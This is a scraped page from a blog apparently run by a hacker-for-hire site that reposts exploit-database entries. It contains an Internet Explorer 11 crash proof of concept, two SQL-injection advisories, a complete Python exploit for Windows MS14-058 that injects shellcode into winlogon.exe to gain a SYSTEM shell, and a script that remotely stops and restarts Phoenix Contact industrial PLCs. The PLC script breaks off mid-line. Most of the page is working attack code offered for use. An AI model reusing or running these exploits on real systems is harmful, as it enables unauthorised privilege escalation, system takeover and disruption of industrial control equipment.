Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863144171

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Internet Explorer 11 - Crash PoC
# Google Dork: N/A
# Date: 19th May, 2015
# Exploit Author:  garage4hackers
# Vendor Homepage:  http://garage4hackers.com/showthread.php?t=6246
# Software Link: N/A
# Version: Tested on IE 11
# Tested on: Windows 7
# CVE : N/A

<!doctype html>
<html>
<HEAD><title>case522207.html</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>
*:nth-child(5)::before {
	content: 'moof';
}
*:nth-child(5)::after {
    content:'>>';
}
</style>
</HEAD><body>
<script>
elem0 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem1 = document.createElementNS('http://www.w3.org/2000/svg', 'feGaussianBlur')
elem2 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem3 = document.createElement('dd')
elem4 = document.createElement('map')
elem5 = document.createElement('i')
elem6 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')

document.body.appendChild(elem0)
elem0.appendChild(elem1)
elem1.appendChild(elem2)
elem1.appendChild(elem3)
elem1.appendChild(elem4)
elem1.appendChild(elem5)
elem1.appendChild(elem6)

rangeTxt = document.body.createTextRange()		
randOldNode = document.documentElement.firstChild
randOldNode.parentNode.replaceChild(elem2, randOldNode)
rangeTxt.moveEnd('sentence', '-20')

</script>
</body></html>

How do I reproduce it?

- It has been discovered, tested & reduced on Win7 32-bit Ultimate and runs successfully anytime.

a) Enable Page Heap # gflags.exe /p /enable iexplore.exe /full
b) Execute runMe.html in WinDbg
c) Tested on Win7 32-bit, Win8.1 32-bit, Win8.1 64-bit (not working on Win8, IE 10)
HireHackking 
source: https://www.securityfocus.com/bid/52897/info

VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

VBulletin 4.1.10 is vulnerable; other versions may also be affected. 

http://www.example.com/announcement.php?a=&announcementid=[Sql]
HireHackking 
source: https://www.securityfocus.com/bid/52908/info

TagGator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Update Apr 9, 2012: The vendor disputes this issue stating the issue can not be exploited as described, as the reported parameter does not exist.

http://www.example.com/wp-content/plugins/taggator/taggator.php?tagid=[Sql]
HireHackking
# Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058) # CVE-2014-4113 Privilege Escalation # http://www.offensive-security.com # Thx to Moritz Jodeit for the beautiful writeup # http://www.exploit-db.com/docs/35152.pdf # Target OS Windows 8.0 - 8.1 x64 # Author: Matteo Memelli ryujin <at> offensive-security.com # EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine. from ctypes import * from ctypes.wintypes import * import struct, sys, os, time, threading, signal ULONG_PTR = PVOID = LPVOID HCURSOR = HICON PDWORD = POINTER(DWORD) PQWORD = POINTER(LPVOID) LRESULT = LPVOID UCHAR = c_ubyte QWORD = c_ulonglong CHAR = c_char NTSTATUS = DWORD MIIM_STRING = 0x00000040 MIIM_SUBMENU = 0x00000004 WH_CALLWNDPROC = 0x4 GWLP_WNDPROC = -0x4 NULL = 0x0 SystemExtendedHandleInformation = 64 ObjectDataInformation = 2 STATUS_INFO_LENGTH_MISMATCH = 0xC0000004 STATUS_BUFFER_OVERFLOW = 0x80000005L STATUS_INVALID_HANDLE = 0xC0000008L STATUS_BUFFER_TOO_SMALL = 0xC0000023L STATUS_SUCCESS = 0 TOKEN_ALL_ACCESS = 0xf00ff DISABLE_MAX_PRIVILEGE = 0x1 FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM = ( 0x1000 | 0x2000 ) TH32CS_SNAPPROCESS = 0x02 WinFunc1 = WINFUNCTYPE(LPVOID, INT, WPARAM, LPARAM) WinFunc2 = WINFUNCTYPE(HWND, LPVOID, INT, WPARAM, LPARAM) WNDPROC = WINFUNCTYPE(LPVOID, HWND, UINT, WPARAM, LPARAM) bWndProcFlag = False bHookCallbackFlag = False EXPLOITED = False Hmenu01 = Hmenu02 = None # /* # * windows/x64/exec - 275 bytes # * http://www.metasploit.com # * VERBOSE=false, PrependMigrate=false, EXITFUNC=thread, # * CMD=cmd.exe # */ SHELLCODE = ( "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" "\x2e\x65\x78\x65\x00") class LSA_UNICODE_STRING(Structure): """Represent the LSA_UNICODE_STRING on ntdll.""" _fields_ = [ ("Length", USHORT), ("MaximumLength", USHORT), ("Buffer", LPWSTR), ] class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.""" _fields_ = [ ("Object", PVOID), ("UniqueProcessId", PVOID), ("HandleValue", PVOID), ("GrantedAccess", ULONG), ("CreatorBackTraceIndex", USHORT), ("ObjectTypeIndex", USHORT), ("HandleAttributes", ULONG), ("Reserved", ULONG), ] class SYSTEM_HANDLE_INFORMATION_EX(Structure): """Represent the SYSTEM_HANDLE_INFORMATION on ntdll.""" _fields_ = [ ("NumberOfHandles", PVOID), ("Reserved", PVOID), ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), ] class PUBLIC_OBJECT_TYPE_INFORMATION(Structure): """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.""" _fields_ = [ ("Name", LSA_UNICODE_STRING), ("Reserved", ULONG * 22), ] class MENUITEMINFO(Structure): """Contains information about a menu item.""" _fields_ = [ ("cbSize" , UINT), ("fMask" , UINT), ("fType" , UINT), ("fState" , UINT), ("wID" , UINT), ("hSubMenu" , HMENU), ("hbmpChecked" , HBITMAP), ("hbmpUnchecked", HBITMAP), ("dwItemData" , ULONG_PTR), ("dwTypeData" , LPWSTR), ("cch" , UINT), ("hbmpItem" , HBITMAP), ] class WNDCLASS(Structure): """Contains the window class attributes that are registered by the RegisterClass function.""" _fields_ = [ ("style" , UINT), ("lpfnWndProc" , WNDPROC), ("cbClsExtra" , INT), ("cbWndExtra" , INT), ("hInstance" , HINSTANCE), ("hIcon" , HCURSOR), ("hCursor" , HBITMAP), ("hbrBackground", HBRUSH), ("lpszMenuName" , LPWSTR), ("lpszClassName", LPWSTR), ] class PROCESSENTRY32(Structure): """Describes an entry from a list of the processes residing in the system address space when a snapshot was taken.""" _fields_ = [ ( 'dwSize' , DWORD ) , ( 'cntUsage' , DWORD) , ( 'th32ProcessID' , DWORD) , ( 'th32DefaultHeapID' , POINTER(ULONG)) , ( 'th32ModuleID' , DWORD) , ( 'cntThreads' , DWORD) , ( 'th32ParentProcessID' , DWORD) , ( 'pcPriClassBase' , LONG) , ( 'dwFlags' , DWORD) , ( 'szExeFile' , CHAR * MAX_PATH ) ] user32 = windll.user32 kernel32 = windll.kernel32 ntdll = windll.ntdll advapi32 = windll.advapi32 user32.PostMessageW.argtypes = [HWND, UINT, WPARAM, LPARAM] user32.PostMessageW.restype = BOOL user32.DefWindowProcW.argtypes = [HWND, UINT, WPARAM, LPARAM] user32.DefWindowProcW.restype = LRESULT user32.UnhookWindowsHook.argtypes = [DWORD, WinFunc1] user32.UnhookWindowsHook.restype = BOOL user32.SetWindowLongPtrW.argtypes = [HWND, DWORD, WinFunc2] user32.SetWindowLongPtrW.restype = LPVOID user32.CallNextHookEx.argtypes = [DWORD, DWORD, WPARAM, LPARAM] user32.CallNextHookEx.restype = LRESULT user32.RegisterClassW.argtypes = [LPVOID] user32.RegisterClassW.restype = BOOL user32.CreateWindowExW.argtypes = [DWORD, LPWSTR, LPWSTR, DWORD, INT, INT, INT, INT, HWND, HMENU, HINSTANCE, LPVOID] user32.CreateWindowExW.restype = HWND user32.InsertMenuItemW.argtypes = [HMENU, UINT, BOOL, LPVOID] user32.InsertMenuItemW.restype = BOOL user32.DestroyMenu.argtypes = [HMENU] user32.DestroyMenu.restype = BOOL user32.SetWindowsHookExW.argtypes = [DWORD, WinFunc1, DWORD, DWORD] user32.SetWindowsHookExW.restype = BOOL user32.TrackPopupMenu.argtypes = [HMENU, UINT, INT, INT, INT, HWND, DWORD] user32.TrackPopupMenu.restype = BOOL advapi32.OpenProcessToken.argtypes = [HANDLE, DWORD , POINTER(HANDLE)] advapi32.OpenProcessToken.restype = BOOL advapi32.CreateRestrictedToken.argtypes = [HANDLE, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, POINTER(HANDLE)] advapi32.CreateRestrictedToken.restype = BOOL advapi32.AdjustTokenPrivileges.argtypes = [HANDLE, BOOL, DWORD, DWORD, DWORD, DWORD] advapi32.AdjustTokenPrivileges.restype = BOOL advapi32.ImpersonateLoggedOnUser.argtypes = [HANDLE] advapi32.ImpersonateLoggedOnUser.restype = BOOL kernel32.GetCurrentProcess.restype = HANDLE kernel32.WriteProcessMemory.argtypes = [HANDLE, QWORD, LPCSTR, DWORD, POINTER(LPVOID)] kernel32.WriteProcessMemory.restype = BOOL kernel32.OpenProcess.argtypes = [DWORD, BOOL, DWORD] kernel32.OpenProcess.restype = HANDLE kernel32.VirtualAllocEx.argtypes = [HANDLE, LPVOID, DWORD, DWORD, DWORD] kernel32.VirtualAllocEx.restype = LPVOID kernel32.CreateRemoteThread.argtypes = [HANDLE, QWORD, UINT, QWORD, LPVOID, DWORD, POINTER(HANDLE)] kernel32.CreateRemoteThread.restype = BOOL kernel32.CreateToolhelp32Snapshot.argtypes = [DWORD, DWORD] kernel32.CreateToolhelp32Snapshot.restype = HANDLE kernel32.CloseHandle.argtypes = [HANDLE] kernel32.CloseHandle.restype = BOOL kernel32.Process32First.argtypes = [HANDLE, POINTER(PROCESSENTRY32)] kernel32.Process32First.restype = BOOL kernel32.Process32Next.argtypes = [HANDLE, POINTER(PROCESSENTRY32)] kernel32.Process32Next.restype = BOOL kernel32.GetCurrentThreadId.restype = DWORD ntdll.NtAllocateVirtualMemory.argtypes = [HANDLE, LPVOID, ULONG, LPVOID, ULONG, DWORD] ntdll.NtAllocateVirtualMemory.restype = NTSTATUS ntdll.NtQueryObject.argtypes = [HANDLE, DWORD, POINTER(PUBLIC_OBJECT_TYPE_INFORMATION), DWORD, DWORD] ntdll.NtQueryObject.restype = NTSTATUS ntdll.NtQuerySystemInformation.argtypes = [DWORD, POINTER(SYSTEM_HANDLE_INFORMATION_EX), DWORD, POINTER(DWORD)] ntdll.NtQuerySystemInformation.restype = NTSTATUS def log(msg, e=None): if e == "e": msg = "[!] " + msg if e == "d": msg = "[*] " + msg else: msg = "[+] " + msg print msg def getLastError(): """Format GetLastError""" buf = create_string_buffer(2048) if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, kernel32.GetLastError(), 0, buf, sizeof(buf), NULL): log(buf.value, "e") else: log("Unknown Error", "e") class x_file_handles (Exception): pass def get_type_info(handle): """Get the handle type information.""" public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION() size = DWORD(sizeof(public_object_type_information)) while True: result = ntdll.NtQueryObject(handle, ObjectDataInformation, byref(public_object_type_information), size, 0x0) if result == STATUS_SUCCESS: return public_object_type_information.Name.Buffer elif result == STATUS_INFO_LENGTH_MISMATCH: size = DWORD(size.value * 4) resize(public_object_type_information, size.value) elif result == STATUS_INVALID_HANDLE: return "INVALID HANDLE: %s" % hex(handle) else: raise x_file_handles("NtQueryObject", hex(result)) def get_handles(): """Return all the open handles in the system""" system_handle_information = SYSTEM_HANDLE_INFORMATION_EX() size = DWORD (sizeof (system_handle_information)) while True: result = ntdll.NtQuerySystemInformation( SystemExtendedHandleInformation, byref(system_handle_information), size, byref(size) ) if result == STATUS_SUCCESS: break elif result == STATUS_INFO_LENGTH_MISMATCH: size = DWORD(size.value * 4) resize(system_handle_information, size.value) else: raise x_file_handles("NtQuerySystemInformation", hex(result)) pHandles = cast( system_handle_information.Handles, POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \ system_handle_information.NumberOfHandles) ) for handle in pHandles.contents: yield handle.UniqueProcessId, handle.HandleValue, handle.Object def WndProc(hwnd, message, wParam, lParam): """Window procedure""" global bWndProcFlag if message == 289 and not bWndProcFlag: bWndProcFlag = True user32.PostMessageW(hwnd, 256, 40, 0) user32.PostMessageW(hwnd, 256, 39, 0) user32.PostMessageW(hwnd, 513, 0, 0) return user32.DefWindowProcW(hwnd, message, wParam, lParam) def hook_callback_one(code, wParam, lParam): """Sets a new address for the window procedure""" global bHookCallbackFlag if ((cast((lParam+sizeof(HANDLE)*2),PDWORD)).contents).value == 0x1eb and\ not bHookCallbackFlag: bHookCallbackFlag = True if user32.UnhookWindowsHook(WH_CALLWNDPROC, CALLBACK01): # Sets a new address for the window procedure log("Callback triggered!") log("Setting the new address for the window procedure...") lpPrevWndFunc = user32.SetWindowLongPtrW\ ((cast((lParam+sizeof(HANDLE)*3),PDWORD).contents).value, GWLP_WNDPROC, CALLBACK02) return user32.CallNextHookEx(0, code, wParam, lParam) def hook_callback_two(hWnd, Msg, wParam, lParam): """Once called will return the fake tagWND address""" global EXPLOITED user32.EndMenu() EXPLOITED = True log("Returning the fake tagWND and overwriting token privileges...") return 0x00000000FFFFFFFB def buildMenuAndTrigger(): """Create menus and invoke TrackPopupMenu""" global Hmenu01, Hmenu02 log("Creating windows and menus...") wndClass = WNDCLASS() wndClass.lpfnWndProc = WNDPROC(WndProc) wndClass.lpszClassName = u"pwned" wndClass.cbClsExtra = wndClass.cbWndExtra = 0 # Registering Class if not user32.RegisterClassW(addressof(wndClass)): log("RegisterClassW failed", "e") sys.exit() # Creating the Window hWnd = user32.CreateWindowExW(0, u"pwned", u"pwned", 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL) if not hWnd: log("CreateWindowExW Failed", "e") sys.exit() # Creating popup menu user32.CreatePopupMenu.restype = HMENU Hmenu01 = user32.CreatePopupMenu() if not Hmenu01: log("CreatePopupMenu failed 0x1", "e") sys.exit() Hmenu01Info = MENUITEMINFO() Hmenu01Info.cbSize = sizeof(MENUITEMINFO) Hmenu01Info.fMask = MIIM_STRING # Insert first menu if not user32.InsertMenuItemW(Hmenu01, 0, True, addressof(Hmenu01Info)): log("Error in InsertMenuItema 0x1", "e") user32.DestroyMenu(Hmenu01) sys.exit() # Creating second menu Hmenu02 = user32.CreatePopupMenu() if not Hmenu02: log("CreatePopupMenu failed 0x2", "e") sys.exit() Hmenu02Info = MENUITEMINFO() Hmenu02Info.cbSize = sizeof(MENUITEMINFO) Hmenu02Info.fMask = (MIIM_STRING | MIIM_SUBMENU) Hmenu02Info.dwTypeData = "" Hmenu02Info.cch = 1 Hmenu02Info.hSubMenu = Hmenu01 # Insert second menu if not user32.InsertMenuItemW(Hmenu02, 0, True, addressof(Hmenu02Info)): log("Error in InsertMenuItema 0x2", "e") user32.DestroyMenu(Hmenu01) user32.DestroyMenu(Hmenu01) sys.exit() # Set window callback tid = kernel32.GetCurrentThreadId() if not user32.SetWindowsHookExW(WH_CALLWNDPROC, CALLBACK01, NULL, tid): log("Failed SetWindowsHookExA 0x1", "e") sys.exit() # Crash it! log("Invoking TrackPopupMenu...") user32.TrackPopupMenu(Hmenu02, 0, -10000, -10000, 0, hWnd, NULL) def alloctagWND(): """Allocate a fake tagWND in userspace at address 0x00000000fffffff0""" hProcess = HANDLE(kernel32.GetCurrentProcess()) hToken = HANDLE() hRestrictedToken = HANDLE() if not advapi32.OpenProcessToken(hProcess,TOKEN_ALL_ACCESS, byref(hToken)): log("Could not open current process token", "e") getLastError() sys.exit() if not advapi32.CreateRestrictedToken(hToken, DISABLE_MAX_PRIVILEGE, 0, 0, 0, 0, 0, 0, byref(hRestrictedToken)): log("Could not create the restricted token", "e") getLastError() sys.exit() if not advapi32.AdjustTokenPrivileges(hRestrictedToken, 1, NULL, 0, NULL, NULL): log("Could not adjust privileges to the restricted token", "e") getLastError() sys.exit() # Leak Token addresses in kernel space log("Leaking token addresses from kernel space...") for pid, handle, obj in get_handles(): if pid==os.getpid() and get_type_info(handle) == "Token": if hToken.value == handle: log("Current process token address: %x" % obj) if hRestrictedToken.value == handle: log("Restricted token address: %x" % obj) RestrictedToken = obj CurrentProcessWin32Process = "\x00"*8 # nt!_TOKEN+0x40 Privileges : _SEP_TOKEN_PRIVILEGES # +0x3 overwrite Enabled in _SEP_TOKEN_PRIVILEGES, -0x8 ADD RAX,0x8 TokenAddress = struct.pack("<Q", RestrictedToken+0x40+0x3-0x8) tagWND = "\x41"*11 + "\x00\x00\x00\x00" +\ "\x42"*0xC + "\xf0\xff\xff\xff\x00\x00\x00\x00" +\ "\x00"*8 +\ "\x43"*0x145 + CurrentProcessWin32Process + "\x45"*0x58 +\ TokenAddress + "\x47"*0x28 ## Allocate space for the input buffer lpBaseAddress = LPVOID(0x00000000fffffff0) Zerobits = ULONG(0) RegionSize = LPVOID(0x1000) written = LPVOID(0) dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffffffffffff, byref(lpBaseAddress), 0x0, byref(RegionSize), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) if dwStatus != STATUS_SUCCESS: log("Failed to allocate tagWND object", "e") getLastError() sys.exit() # Copy input buffer to the fake tagWND nSize = 0x200 written = LPVOID(0) lpBaseAddress = QWORD(0x00000000fffffff0) dwStatus = kernel32.WriteProcessMemory(0xffffffffffffffff, lpBaseAddress, tagWND, nSize, byref(written)) if dwStatus == 0: log("Failed to copy the input buffer to the tagWND object", "e") getLastError() sys.exit() log("Fake win32k!tagWND allocated, written %d bytes to 0x%x" %\ (written.value, lpBaseAddress.value)) return hRestrictedToken def injectShell(hPrivilegedToken): """Impersonate privileged token and inject shellcode into winlogon.exe""" while not EXPLOITED: time.sleep(0.1) log("-"*70) log("Impersonating the privileged token...") if not advapi32.ImpersonateLoggedOnUser(hPrivilegedToken): log("Could not impersonate the privileged token", "e") getLastError() sys.exit() # Get winlogon.exe pid pid = getpid("winlogon.exe") # Get a handle to the winlogon process we are injecting into hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid)) if not hProcess: log("Couldn't acquire a handle to PID: %s" % pid, "e") sys.exit() log("Obtained handle 0x%x for the winlogon.exe process" % hProcess) # Creating shellcode buffer to inject into the host process sh = create_string_buffer(SHELLCODE, len(SHELLCODE)) code_size = len(SHELLCODE) # Allocate some space for the shellcode (in the program memory) sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) if not sh_address: log("Could not allocate shellcode in the remote process") getLastError() sys.exit() log("Allocated memory at address 0x%x" % sh_address) # Inject shellcode in to winlogon.exe process space written = LPVOID(0) shellcode = QWORD(sh_address) dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size, byref(written)) if not dwStatus: log("Could not write shellcode into winlogon.exe", "e") getLastError() sys.exit() log("Injected %d bytes of shellcode to 0x%x" % (written.value, sh_address)) # Now we create the remote thread and point its entry routine to be head of # our shellcode thread_id = HANDLE(0) if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0, byref(thread_id)): log("Failed to inject shellcode into winlogon.exe") sys.exit(0) log("Remote thread 0x%08x created" % thread_id.value) log("Spawning SYSTEM shell...") # Kill python process to kill the window and avoid BSODs os.kill(os.getpid(), signal.SIGABRT) def getpid(procname): """ Get Process Pid by procname """ pid = None try: hProcessSnap = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) pe32 = PROCESSENTRY32() pe32.dwSize = sizeof(PROCESSENTRY32) ret = kernel32.Process32First(hProcessSnap , byref(pe32)) while ret: if pe32.szExeFile == LPSTR(procname).value: pid = pe32.th32ProcessID ret = kernel32.Process32Next(hProcessSnap, byref(pe32)) kernel32.CloseHandle ( hProcessSnap ) except Exception, e: log(str(e), "e") if not pid: log("Could not find %s PID" % procname) sys.exit() return pid CALLBACK01 = WinFunc1(hook_callback_one) CALLBACK02 = WinFunc2(hook_callback_two) if __name__ == '__main__': log("MS14-058 Privilege Escalation - ryujin <at> offensive-security.com", "d") # Prepare the battlefield hPrivilegedToken = alloctagWND() # Start the injection thread t1 = threading.Thread(target=injectShell, args = (hPrivilegedToken,)) t1.daemon = False t1.start() # Trigger the vuln buildMenuAndTrigger()
HireHackking

Phoenix Contact ILC 150 ETH PLC - Remote Control Script

HACKER · %s · %s

#!/usr/bin/env python ''' # Exploit Title: Phoenix Contact ILC 150 ETH PLC Remote Control script # Date: 2015-05-19 # Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be # Vendor Homepage: https://www.phoenixcontact.com/online/portal/us?urile=pxc-oc-itemdetail:pid=2985330 # Version: ALL FW VERSIONS # Tested on: Python runs on Windows, Linux # CVE : CVE-2014-9195 Copyright 2015 Photubias(c) Written for Howest(c) University College This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name ControlPLC.py written by tijl[dot]deneut[at]howest[dot]be This POC will print out the current status of the PLC, continuously every 0.1 second, after 3 seconds it reverts (start becomes stop, stop becomes cold start), and stops after 5 seconds Works on ILC 15x ETH, partly on RFC 43x, partly on ILC 39x ''' import sys, socket, binascii, time, os, select, re IP='' infoport=1962 controlport=41100 ## Defining Functions First def send_and_recv(s,size,strdata): data = binascii.unhexlify(strdata) ## Convert to real HEX (\x00\x00 ...) s.send(data) ret = s.recv(4096) return ret def doAction(s,strdata): ret = send_and_recv(s,1000,strdata) # In official state these are send, they do not seem to be needed send_and_recv(s,1000,packet1) send_and_recv(s,1000,packet2) send_and_recv(s,1000,packet2) ret = send_and_recv(s,1000,'010002000000020003000100000000000840') send_and_recv(s,1000,packet2) return ret def initMonitor(s): send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200') send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500') send_and_recv(s,1000,'0100000000002500000000000000d9ff4164652e52656d6f74696e672e53657276696365732e49466f726365536572766963653200') send_and_recv(s,1000,'010000000000240000000000000000004164652e52656d6f74696e672e53657276696365732e49466f7263655365727669636500') send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300') send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653300') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653200') send_and_recv(s,1000,'0100000000002900000000000000d5ff4164652e52656d6f74696e672e53657276696365732e49427265616b706f696e745365727669636500') send_and_recv(s,1000,'0100000000002800000000000000d6ff4164652e52656d6f74696e672e53657276696365732e4943616c6c737461636b5365727669636500') send_and_recv(s,1000,'010000000000250000000000000000004164652e52656d6f74696e672e53657276696365732e494465627567536572766963653200') send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200') send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500') send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300') send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200') send_and_recv(s,1000,'0100020000000e0003000300000000000500000012401340130011401200') return def is_ipv4(ip): match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", ip) if not match: return False quad = [] for number in match.groups(): quad.append(int(number)) if quad[0] < 1: return False for number in quad: if number > 255 or number < 0: return False return True ##### The Actual Program if not len(sys.argv) == 2: IP = raw_input("Please enter the IPv4 address of the Phoenix PLC: ") else: IP = sys.argv[1] if not is_ipv4(IP): print "Please go read RFC 791 and then use a legitimate IPv4 address." sys.exit() ## - initialization, this will get the PLC type, Firmware version, build date & time s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((IP,infoport)) print 'Initializing PLC' print '----------------' code = send_and_recv(s,1000,'0101001a005e000000000003000c494245544830314e305f4d00').encode('hex')[34:36] send_and_recv(s,1000,'01050016005f000008ef00' + code + '00000022000402950000') ret = send_and_recv(s,1000,'0106000e00610000881100' + code + '0400') print 'PLC Type = ' + ret[30:50] print 'Firmware = ' + ret[66:70] print 'Build = ' + ret[79:100] send_and_recv(s,1000,'0105002e00630000000000' + code + '00000023001c02b0000c0000055b4433325d0b466c617368436865636b3101310000') send_and_recv(s,1000,'0106000e0065ffffff0f00' + code + '0400') send_and_recv(s,1000,'010500160067000008ef00' + code + '00000024000402950000') send_and_recv(s,1000,'0106000e0069ffffff0f00' + code + '0400') send_and_recv(s,1000,'0102000c006bffffff0f00' + code) s.shutdown(socket.SHUT_RDWR) s.close() print 'Initialization done' print '-------------------\r\n' print 'Will now print the PLC state and reverse it after 3 seconds' raw_input('Press [Enter] to continue') ########## CONTROL PHASE ####### Start monitoring with loop on port 41100 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((IP,controlport)) # First init phase (sending things like 'Ade.Remoting.Services.IProConOSControlService2' and 'Ade.Remoting.Services.ISimpleFileAccessService3', 21 packets) initMonitor(s) # Query packet packet1 = '010002000000080003000300000000000200000002400b40' # Keepalive packet packet2 = '0100020000001c0003000300000000000c00000007000500060008001000020011000e000f000d0016401600' ## The loop keepalive and query status loop (2 x keepalive, one time query): i = 0 state = 'On' running = 0 stopme = 0 startme = 0 while True: i += 1 time.sleep(0.1) ## Keep Alive send_and_recv(s,1000,packet2) send_and_recv(s,1000,packet2) ## Possible actions (like stop/start) should be sent now before the query state if (state == 'Running' and stopme): print 'Sending Stop' doAction(s,'01000200000000000100070000000000') startme = stopme = 0 elif (state == 'Stop' and startme): print 'Sending COLD Start' ## This is the COLD start: doAction(s,'010002000000020001000600000000000100') ## This is the WARM start: doAction(s,'010002000000020001000600000000000200') ## This is the HOT start: doAction(s,'010002000000020001000600000000000300') doAction(s,'010002000000020001000600000000000100') startme = stopme = 0 ## Query Status ret = 